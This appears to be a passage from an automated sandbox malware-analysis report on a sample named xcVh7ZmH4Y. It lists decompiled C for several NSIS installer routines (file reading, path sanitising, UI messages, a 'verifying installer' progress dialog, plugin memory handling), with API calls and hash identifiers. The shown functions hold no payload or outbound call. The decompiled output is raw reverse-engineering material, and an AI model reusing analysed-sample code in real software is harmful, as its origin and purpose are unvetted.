                                                														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                															continue;
                                                														} else {
                                                															goto L21;
                                                														}
                                                														goto L22;
                                                													}
                                                												}
                                                												L22:
                                                												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                													goto L28;
                                                												} else {
                                                													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                														} else {
                                                															__ecx =  *(__ebp - 0xc);
                                                															__edx =  *(__ebp - 8);
                                                															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                														}
                                                														goto L34;
                                                													} else {
                                                														__ecx =  *(__ebp - 0xc);
                                                														__edx =  *(__ebp - 8);
                                                														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                														 *(__ebp - 0x38) = __eax;
                                                														if(__ax == __bx) {
                                                															goto L34;
                                                														} else {
                                                															goto L26;
                                                														}
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                								goto L37;
                                                								L26:
                                                								__eax =  *(__ebp - 8);
                                                							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                						}
                                                						goto L34;
                                                					}
                                                				}
                                                				L37:
                                                				return 0;
                                                			}








                                                0x004026ec
                                                0x004026ee
                                                0x004026f1
                                                0x004026f3
                                                0x004026f6
                                                0x004026fb
                                                0x004026ff
                                                0x00402702
                                                0x00402705
                                                0x00402c2a
                                                0x00402c2d
                                                0x0040270b
                                                0x0040270b
                                                0x00402712
                                                0x00402714
                                                0x00402714
                                                0x0040271a
                                                0x0040287e
                                                0x0040287e
                                                0x00402881
                                                0x00402886
                                                0x004015b6
                                                0x0040292e
                                                0x0040292e
                                                0x00000000
                                                0x00402720
                                                0x00402721
                                                0x0040272c
                                                0x0040272f
                                                0x0040273b
                                                0x0040273f
                                                0x004027d7
                                                0x004027ef
                                                0x004027ff
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402745
                                                0x00402745
                                                0x00402748
                                                0x00402749
                                                0x0040274c
                                                0x00402751
                                                0x00402758
                                                0x00402760
                                                0x00000000
                                                0x00402766
                                                0x00402766
                                                0x0040276b
                                                0x00000000
                                                0x00402771
                                                0x00402771
                                                0x00402779
                                                0x0040277c
                                                0x0040277f
                                                0x0040283a
                                                0x00402841
                                                0x00402785
                                                0x0040278b
                                                0x00402797
                                                0x00402801
                                                0x00402801
                                                0x00402799
                                                0x00402799
                                                0x0040279c
                                                0x0040279e
                                                0x0040279e
                                                0x0040279e
                                                0x004027a1
                                                0x004027a6
                                                0x004027a9
                                                0x00000000
                                                0x00000000
                                                0x004027ab
                                                0x004027ae
                                                0x004027bc
                                                0x004027c2
                                                0x004027d0
                                                0x00000000
                                                0x004027d2
                                                0x00000000
                                                0x004027d2
                                                0x00000000
                                                0x004027d0
                                                0x0040279e
                                                0x00402804
                                                0x00402807
                                                0x00000000
                                                0x00402809
                                                0x0040280e
                                                0x0040284f
                                                0x00402871
                                                0x00402878
                                                0x0040285d
                                                0x0040285d
                                                0x00402860
                                                0x00402863
                                                0x00402866
                                                0x00402866
                                                0x00000000
                                                0x00402817
                                                0x00402817
                                                0x0040281a
                                                0x0040281d
                                                0x00402823
                                                0x00402827
                                                0x0040282a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040282a
                                                0x0040280e
                                                0x00402807
                                                0x0040277f
                                                0x0040276b
                                                0x00402760
                                                0x00000000
                                                0x0040282c
                                                0x0040282c
                                                0x0040282f
                                                0x00402838
                                                0x00000000
                                                0x0040272f
                                                0x0040271a
                                                0x00402c33
                                                0x00402c39

                                                APIs
                                                • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                  • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                • String ID: 9
                                                • API String ID: 163830602-2366072709
                                                • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E73542480(void* __edx) {
                                                				void* _t37;
                                                				signed int _t38;
                                                				void* _t39;
                                                				void* _t41;
                                                				signed char* _t42;
                                                				signed char* _t51;
                                                				void* _t52;
                                                				void* _t54;
                                                
                                                				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                				while(1) {
                                                					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                					_t52 = _t51[0x18];
                                                					if(_t52 == 0) {
                                                						goto L9;
                                                					}
                                                					_t41 = 0x1a;
                                                					if(_t52 == _t41) {
                                                						goto L9;
                                                					}
                                                					if(_t52 != 0xffffffff) {
                                                						if(_t52 <= 0 || _t52 > 0x19) {
                                                							_t51[0x18] = _t41;
                                                							goto L12;
                                                						} else {
                                                							_t37 = E7354135A(_t52 - 1);
                                                							L10:
                                                							goto L11;
                                                						}
                                                					} else {
                                                						_t37 = E735412E3();
                                                						L11:
                                                						_t52 = _t37;
                                                						L12:
                                                						_t13 =  &(_t51[8]); // 0x1020
                                                						_t42 = _t13;
                                                						if(_t51[4] >= 0) {
                                                						}
                                                						_t38 =  *_t51 & 0x000000ff;
                                                						_t51[0x1c] = 0;
                                                						if(_t38 > 7) {
                                                							L27:
                                                							_t39 = GlobalFree(_t52);
                                                							if( *(_t54 + 0x10) == 0) {
                                                								return _t39;
                                                							}
                                                							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                							} else {
                                                								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                							}
                                                							continue;
                                                						} else {
                                                							switch( *((intOrPtr*)(_t38 * 4 +  &M735425F8))) {
                                                								case 0:
                                                									 *_t42 = 0;
                                                									goto L27;
                                                								case 1:
                                                									__eax = E735413B1(__ebp);
                                                									goto L21;
                                                								case 2:
                                                									 *__edi = E735413B1(__ebp);
                                                									__edi[1] = __edx;
                                                									goto L27;
                                                								case 3:
                                                									__eax = GlobalAlloc(0x40,  *0x7354506c);
                                                									 *(__esi + 0x1c) = __eax;
                                                									__edx = 0;
                                                									 *__edi = __eax;
                                                									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x7354506c, __eax,  *0x7354506c, 0, 0);
                                                									goto L27;
                                                								case 4:
                                                									__eax = E735412CC(__ebp);
                                                									 *(__esi + 0x1c) = __eax;
                                                									L21:
                                                									 *__edi = __eax;
                                                									goto L27;
                                                								case 5:
                                                									__eax = GlobalAlloc(0x40, 0x10);
                                                									_push(__eax);
                                                									 *(__esi + 0x1c) = __eax;
                                                									_push(__ebp);
                                                									 *__edi = __eax;
                                                									__imp__CLSIDFromString();
                                                									goto L27;
                                                								case 6:
                                                									if( *__ebp != __cx) {
                                                										__eax = E735413B1(__ebp);
                                                										 *__ebx = __eax;
                                                									}
                                                									goto L27;
                                                								case 7:
                                                									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                									( *(__esi + 0x18) - 1) *  *0x7354506c =  *0x73545074 + ( *(__esi + 0x18) - 1) *  *0x7354506c * 2 + 0x18;
                                                									 *__ebx =  *0x73545074 + ( *(__esi + 0x18) - 1) *  *0x7354506c * 2 + 0x18;
                                                									asm("cdq");
                                                									__eax = E73541510(__edx,  *0x73545074 + ( *(__esi + 0x18) - 1) *  *0x7354506c * 2 + 0x18, __edx,  *0x73545074 + ( *(__esi + 0x18) - 1) *  *0x7354506c * 2);
                                                									goto L27;
                                                							}
                                                						}
                                                					}
                                                					L9:
                                                					_t37 = E735412CC(0x73545044);
                                                					goto L10;
                                                				}
                                                			}











                                                0x73542494
                                                0x73542498
                                                0x735424a3
                                                0x735424a3
                                                0x735424aa
                                                0x735424af
                                                0x00000000
                                                0x00000000
                                                0x735424b3
                                                0x735424b6
                                                0x00000000
                                                0x00000000
                                                0x735424bb
                                                0x735424c6
                                                0x735424d6
                                                0x00000000
                                                0x735424cd
                                                0x735424cf
                                                0x735424e5
                                                0x00000000
                                                0x735424e5
                                                0x735424bd
                                                0x735424bd
                                                0x735424e6
                                                0x735424e6
                                                0x735424e8
                                                0x735424ec
                                                0x735424ec
                                                0x735424ef
                                                0x735424ef
                                                0x735424f7
                                                0x735424ff
                                                0x73542502
                                                0x735425c1
                                                0x735425c2
                                                0x735425cd
                                                0x735425f7
                                                0x735425f7
                                                0x735425dd
                                                0x735425e9
                                                0x735425df
                                                0x735425df
                                                0x735425df
                                                0x00000000
                                                0x73542508
                                                0x73542508
                                                0x00000000
                                                0x7354250f
                                                0x00000000
                                                0x00000000
                                                0x73542517
                                                0x00000000
                                                0x00000000
                                                0x73542525
                                                0x73542527
                                                0x00000000
                                                0x00000000
                                                0x73542548
                                                0x7354254e
                                                0x73542551
                                                0x73542553
                                                0x73542563
                                                0x00000000
                                                0x00000000
                                                0x73542530
                                                0x73542535
                                                0x73542538
                                                0x73542539
                                                0x00000000
                                                0x00000000
                                                0x7354256f
                                                0x73542575
                                                0x73542576
                                                0x73542579
                                                0x7354257a
                                                0x7354257c
                                                0x00000000
                                                0x00000000
                                                0x73542588
                                                0x7354258b
                                                0x73542597
                                                0x73542599
                                                0x00000000
                                                0x00000000
                                                0x735425a5
                                                0x735425b1
                                                0x735425b4
                                                0x735425b6
                                                0x735425b9
                                                0x00000000
                                                0x00000000
                                                0x73542508
                                                0x73542502
                                                0x735424db
                                                0x735424e0
                                                0x00000000
                                                0x735424e0

                                                APIs
                                                • GlobalFree.KERNEL32 ref: 735425C2
                                                  • Part of subcall function 735412CC: lstrcpynW.KERNEL32(00000000,?,7354137F,00000019,735411CA,-000000A0), ref: 735412DC
                                                • GlobalAlloc.KERNEL32(00000040), ref: 73542548
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73542563
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.896849351.0000000073541000.00000020.00000001.01000000.00000004.sdmp, Offset: 73540000, based on PE: true
                                                • Associated: 00000000.00000002.896815263.0000000073540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.896857446.0000000073544000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.896866612.0000000073546000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_73540000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                • String ID: @hv
                                                • API String ID: 4216380887-3217783804
                                                • Opcode ID: 43c1618bf3577392c7aa58f5daea3c4f71f3d20a10b34c5e9971583b3e8ec71e
                                                • Instruction ID: 1f5b2451c0353055974f15e0562ba0184b046dbc1427d8e2fd976a977f201401
                                                • Opcode Fuzzy Hash: 43c1618bf3577392c7aa58f5daea3c4f71f3d20a10b34c5e9971583b3e8ec71e
                                                • Instruction Fuzzy Hash: CF41AEB1008329DFE71DEF26F844F6677B8FB84310F20991EE94A8B585EB30A545CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E004067C4(WCHAR* _a4) {
                                                				short _t5;
                                                				short _t7;
                                                				WCHAR* _t19;
                                                				WCHAR* _t20;
                                                				WCHAR* _t21;
                                                
                                                				_t20 = _a4;
                                                				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                					_t20 =  &(_t20[4]);
                                                				}
                                                				if( *_t20 != 0 && E00405E83(_t20) != 0) {
                                                					_t20 =  &(_t20[2]);
                                                				}
                                                				_t5 =  *_t20;
                                                				_t21 = _t20;
                                                				_t19 = _t20;
                                                				if(_t5 != 0) {
                                                					do {
                                                						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
                                                							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                							_t19 = CharNextW(_t19);
                                                						}
                                                						_t20 = CharNextW(_t20);
                                                						_t5 =  *_t20;
                                                					} while (_t5 != 0);
                                                				}
                                                				 *_t19 =  *_t19 & 0x00000000;
                                                				while(1) {
                                                					_push(_t19);
                                                					_push(_t21);
                                                					_t19 = CharPrevW();
                                                					_t7 =  *_t19;
                                                					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                						break;
                                                					}
                                                					 *_t19 =  *_t19 & 0x00000000;
                                                					if(_t21 < _t19) {
                                                						continue;
                                                					}
                                                					break;
                                                				}
                                                				return _t7;
                                                			}








                                                0x004067c6
                                                0x004067cf
                                                0x004067e6
                                                0x004067e6
                                                0x004067ed
                                                0x004067f9
                                                0x004067f9
                                                0x004067fc
                                                0x004067ff
                                                0x00406804
                                                0x00406806
                                                0x0040680f
                                                0x00406813
                                                0x00406830
                                                0x00406838
                                                0x00406838
                                                0x0040683d
                                                0x0040683f
                                                0x00406842
                                                0x00406847
                                                0x00406848
                                                0x0040684c
                                                0x0040684c
                                                0x0040684d
                                                0x00406854
                                                0x00406856
                                                0x0040685d
                                                0x00000000
                                                0x00000000
                                                0x00406865
                                                0x0040686b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040686b
                                                0x00406870

                                                APIs
                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                • CharNextW.USER32(?,00000000,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                • CharPrevW.USER32(?,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-826357637
                                                • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
                                                				long _v8;
                                                				signed char _v12;
                                                				unsigned int _v16;
                                                				void* _v20;
                                                				intOrPtr _v24;
                                                				long _v56;
                                                				void* _v60;
                                                				long _t15;
                                                				unsigned int _t19;
                                                				signed int _t25;
                                                				struct HWND__* _t28;
                                                
                                                				_t28 = _a4;
                                                				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                				if(_a8 == 0) {
                                                					L4:
                                                					_v56 = _t15;
                                                					_v60 = 4;
                                                					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                					return _v24;
                                                				}
                                                				_t19 = GetMessagePos();
                                                				_v16 = _t19 >> 0x10;
                                                				_v20 = _t19;
                                                				ScreenToClient(_t28,  &_v20);
                                                				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                				if((_v12 & 0x00000066) != 0) {
                                                					_t15 = _v8;
                                                					goto L4;
                                                				}
                                                				return _t25 | 0xffffffff;
                                                			}














                                                0x00404e62
                                                0x00404e6f
                                                0x00404e75
                                                0x00404eb3
                                                0x00404eb3
                                                0x00404ec2
                                                0x00404ec9
                                                0x00000000
                                                0x00404ecb
                                                0x00404e77
                                                0x00404e86
                                                0x00404e8e
                                                0x00404e91
                                                0x00404ea3
                                                0x00404ea9
                                                0x00404eb0
                                                0x00000000
                                                0x00404eb0
                                                0x00000000

                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                • GetMessagePos.USER32 ref: 00404E77
                                                • ScreenToClient.USER32 ref: 00404E91
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                				short _v132;
                                                				int _t11;
                                                				int _t20;
                                                
                                                				if(_a8 == 0x110) {
                                                					SetTimer(_a4, 1, 0xfa, 0);
                                                					_a8 = 0x113;
                                                				}
                                                				if(_a8 == 0x113) {
                                                					_t20 =  *0x41ea18; // 0x4ad42
                                                					_t11 =  *0x42aa24; // 0x4ad46
                                                					if(_t20 >= _t11) {
                                                						_t20 = _t11;
                                                					}
                                                					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                					SetWindowTextW(_a4,  &_v132);
                                                					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                				}
                                                				return 0;
                                                			}






                                                0x00402fa3
                                                0x00402fb1
                                                0x00402fb7
                                                0x00402fb7
                                                0x00402fc5
                                                0x00402fc7
                                                0x00402fcd
                                                0x00402fd4
                                                0x00402fd6
                                                0x00402fd6
                                                0x00402fec
                                                0x00402ffc
                                                0x0040300e
                                                0x0040300e
                                                0x00403016

                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                • MulDiv.KERNEL32(0004AD42,00000064,0004AD46), ref: 00402FDC
                                                • wsprintfW.USER32 ref: 00402FEC
                                                • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                • SetDlgItemTextW.USER32 ref: 0040300E
                                                Strings
                                                • verifying installer: %d%%, xrefs: 00402FE6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E73542655() {
                                                				intOrPtr _t24;
                                                				void* _t26;
                                                				intOrPtr _t27;
                                                				signed int _t39;
                                                				void* _t40;
                                                				void* _t43;
                                                				intOrPtr _t44;
                                                				void* _t45;
                                                
                                                				_t40 = E735412BB();
                                                				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                                                				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                                                				_t43 = (_t44 + 0x81 << 5) + _t24;
                                                				do {
                                                					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                                                					}
                                                					_t39 =  *(_t43 - 8) & 0x000000ff;
                                                					if(_t39 <= 7) {
                                                						switch( *((intOrPtr*)(_t39 * 4 +  &M73542784))) {
                                                							case 0:
                                                								 *_t40 = 0;
                                                								goto L17;
                                                							case 1:
                                                								__eax =  *__eax;
                                                								if(__ecx > __ebx) {
                                                									 *(__esp + 0x10) = __ecx;
                                                									__ecx =  *(0x7354407c + __edx * 4);
                                                									__edx =  *(__esp + 0x10);
                                                									__ecx = __ecx * __edx;
                                                									asm("sbb edx, edx");
                                                									__edx = __edx & __ecx;
                                                									__eax = __eax &  *(0x7354409c + __edx * 4);
                                                								}
                                                								_push(__eax);
                                                								goto L15;
                                                							case 2:
                                                								__eax = E73541510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                								goto L16;
                                                							case 3:
                                                								__ecx =  *0x7354506c;
                                                								__edx = __ecx - 1;
                                                								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                                                								__eax =  *0x7354506c;
                                                								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                                                								goto L17;
                                                							case 4:
                                                								__eax = lstrcpynW(__edi,  *__eax,  *0x7354506c);
                                                								goto L17;
                                                							case 5:
                                                								_push( *0x7354506c);
                                                								_push(__edi);
                                                								_push( *__eax);
                                                								__imp__StringFromGUID2();
                                                								goto L17;
                                                							case 6:
                                                								_push( *__esi);
                                                								L15:
                                                								__eax = wsprintfW(__edi, 0x73545000);
                                                								L16:
                                                								__esp = __esp + 0xc;
                                                								goto L17;
                                                						}
                                                					}
                                                					L17:
                                                					_t26 =  *(_t43 + 0x14);
                                                					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                						GlobalFree(_t26);
                                                					}
                                                					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                					if(_t27 != 0) {
                                                						if(_t27 != 0xffffffff) {
                                                							if(_t27 > 0) {
                                                								E73541381(_t27 - 1, _t40);
                                                								goto L26;
                                                							}
                                                						} else {
                                                							E73541312(_t40);
                                                							L26:
                                                						}
                                                					}
                                                					_t44 = _t44 - 1;
                                                					_t43 = _t43 - 0x20;
                                                				} while (_t44 >= 0);
                                                				return GlobalFree(_t40);
                                                			}











                                                0x7354265f
                                                0x73542661
                                                0x73542665
                                                0x73542674
                                                0x73542678
